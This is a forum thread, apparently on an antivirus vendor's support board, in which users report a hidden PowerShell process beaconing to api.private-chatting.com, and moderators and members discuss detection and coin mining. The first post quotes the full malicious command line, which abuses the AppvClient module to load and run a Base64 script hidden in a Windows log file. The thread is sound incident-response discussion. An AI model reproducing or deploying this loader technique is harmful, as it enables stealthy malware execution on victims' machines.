Kevin999 3 Posted April 25, 2022 Share Posted April 25, 2022 (edited) Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today. Conhost.exe and powershell.exe was running background, but I didn't run each of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves. I use ESET SysInspector to captured a snapshot. I used nslookup to reslove: C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07 DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 DNS request timed out. timeout was 2 seconds. *** 请求 UnKnown 超时 C:\Users\Admin>nslookup api.private-chatting.com DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.1 非权威应答: 名称: api.private-chatting.com Addresses: 2606:4700:3032::6815:38d6 2606:4700:3031::ac43:9c07 104.21.56.214 __Today__ I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block} 2. Find C:\Windows\logs\system-logs.txt , find these strings Snipped: The code was moved to the the attached file to squeeze the post. Please note $EndPointURL = "hxxp://api.private-chatting.com/connect"; It's as same as the URL in pcapng file. system-logs.txt Strange traffic_20220424.rar system-logs.rar Edited April 25, 2022 by Marcos Script moved to an attached file Leonardo 1 Link to comment Share on other sites More sharing options...
Kevin999 3 Posted April 25, 2022 Author Share Posted April 25, 2022 I also use ESET SysInspector to capture a snapshot, I can upload it if in need. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 25, 2022 Administrators Share Posted April 25, 2022 A detection will be added: PowerShell/Agent.GZ trojan Leonardo 1 Link to comment Share on other sites More sharing options...
ca81 1 Posted April 27, 2022 Share Posted April 27, 2022 hi i have the same process. how remove it. i try disable powershell ect... but nothing. have lock ip in firewall same now new. how can i do for remove pls ??? ty execute nod32 but found nothing 2606:4700:3032::6815:38d6:80 Leonardo 1 Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 27, 2022 Administrators Share Posted April 27, 2022 You should find out the PowerShell script that was executed. Most likely it's legitimate which is also why it wasn't detected and there's no reason to be concerned. Please provide logs collected with ESET Log Collector for a check. Link to comment Share on other sites More sharing options...
itman 1,786 Posted April 27, 2022 Share Posted April 27, 2022 (edited) 47 minutes ago, ca81 said: 2606:4700:3032::6815:38d6:80 Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity. Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time. Edited April 27, 2022 by itman Leonardo 1 Link to comment Share on other sites More sharing options...
itman 1,786 Posted April 27, 2022 Share Posted April 27, 2022 In regard to the prior PowerShell code posted: Attacker dropped the coinminer code file previously in highlighted Windows log file directory. Attacker is creating App_V process remotely using Sync-AppPublishingServer. Leonardo 1 Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you! Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 28, 2022 Administrators Share Posted April 28, 2022 3 minutes ago, Soul said: I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you! Please provide logs collected with ESET Log Collector for a start. Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 (edited) It is exactly the same stuff above. Exact same ip addresses and the api.chatting thing. Exact same shell command that is causing powershell to run in the background. What Itman posted is the shell command being executed. Edited April 28, 2022 by Soul Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 28, 2022 Administrators Share Posted April 28, 2022 C:\Windows\logs\system-logs.txt should be detected. Please scan it with ESET. If not detected, supply it to me please. Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 (edited) it was not detected Edited April 28, 2022 by Soul Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 sorry im a little confused. Which log file should i be giving you. I scanned the system_log file with eset and it said it was fine. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 28, 2022 Administrators Share Posted April 28, 2022 Let's start off by providing logs collected with ESET Log Collector. Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 28, 2022 Administrators Share Posted April 28, 2022 23 minutes ago, Soul said: yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with According to the logs provided you don't have ESET installed. On the other hand, there's an install log from yesterday that reads:(SERVER) MSI (s) (80:C4) [22:51:31:369]: Product: ESET Security -- Installation completed successfully. (SERVER) MSI (s) (80:C4) [22:51:31:370]: Windows Installer installed the product. Product Name: ESET Security. Product Version: 15.1.12.0. Product Language: 1033. Manufacturer: ESET, spol. s r.o.. Installation success or error status: 0. That said, it looks like ESET was uninstalled prior to collecting the logs. Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 I did but i removed because i wanted to see if the script it blocked was permanent or temp and i couldnt turn it off so i uninstalled it and the script executed. Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 I just installed ESET again and now running the log collector Link to comment Share on other sites More sharing options...
Soul 0 Posted April 28, 2022 Share Posted April 28, 2022 im unable to send its 200mb Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 28, 2022 Administrators Share Posted April 28, 2022 You can upload it to a file sharing service, such as OneDrive, Dropbox, etc. and drop me a private message with a download link. Link to comment Share on other sites More sharing options...
itman 1,786 Posted April 28, 2022 Share Posted April 28, 2022 (edited) 7 hours ago, Marcos said: This is an actual log. Did you send a correct file? Assume the file containing the Base64 encrypted coinminer code could be dropped anywhere. The attacker could actually now be creating a diversion where he is dropping two files; one being a legit system-logs.txt log file. Also assume that since the file dropping is occurring prior to PowerShell execution, the coinminer code is being altered to defeat signature detection. Appears to me a reverse shell has been created which is the source of the above activity. The key to stopping this coinminer is to find the reverse shell and create a sig. for it. Most likely for the attacker IP address being dialed out to. My advice is create an Eset HIPS ask rule to monitor PowerShell.exe startup. Make sure alerting and log level of warning are specified. Hopefully this will point to what is running the script. Not sure here if the HIPS will detect the remote execution of the script. This HIPS ask rule should not cause issues for home users who would not be deploying PowerShell scripts for anything. Edited April 28, 2022 by itman Link to comment Share on other sites More sharing options...
itman 1,786 Posted April 28, 2022 Share Posted April 28, 2022 (edited) I am also going to perform a "connecting of the dots" exercise here: 1. The PowerShell script is signed. 2. The IP addresses being used track to Cloudflare. 3. Incident reports to date are China, France, and the U.S.. 4 The OP who started the thread stated a CPU usage spike of 10%; a low rate for coin miners. 5. PowerShell execution is not hidden in the least. Putting it all together strongly points to a legit software install that is performing coin mining. Hell, even Norton AV is doing it currently: https://www.theverge.com/2022/1/7/22869528/norton-crypto-miner-security-software-reaction . Edited April 28, 2022 by itman Link to comment Share on other sites More sharing options...
itman 1,786 Posted April 28, 2022 Share Posted April 28, 2022 (edited) Another thing I noticed from the OP's screen shot of running tasks is that he has WMware installed. The PowerShell script is loading the AppVClient. Finally, WMware has recent postings of RCE vulnerabilities: https://www.vmware.com/security/advisories/VMSA-2022-0010.html . One of these RCE vulnerabilites is currently being exploited: https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html and PowerShell is part of the attack. More details here: Quote Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR). https://blog.morphisec.com/vmware-identity-manager-attack-backdoor . Edited April 28, 2022 by itman Link to comment Share on other sites More sharing options...
Administrators Marcos 5,394 Posted April 29, 2022 Administrators Share Posted April 29, 2022 The OP has just installed ESET and it detected a PowerShell malware: Since then I haven't heard if the threat has been resolved or not. Link to comment Share on other sites More sharing options...
Kevin999 3 Posted April 29, 2022 Author Share Posted April 29, 2022 (edited) 1 hour ago, Marcos said: The OP has just installed ESET and it detected a PowerShell malware: Since then I haven't heard if the threat has been resolved or not. The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that. Edited April 29, 2022 by Kevin999 Link to comment Share on other sites More sharing options...
Recommended Posts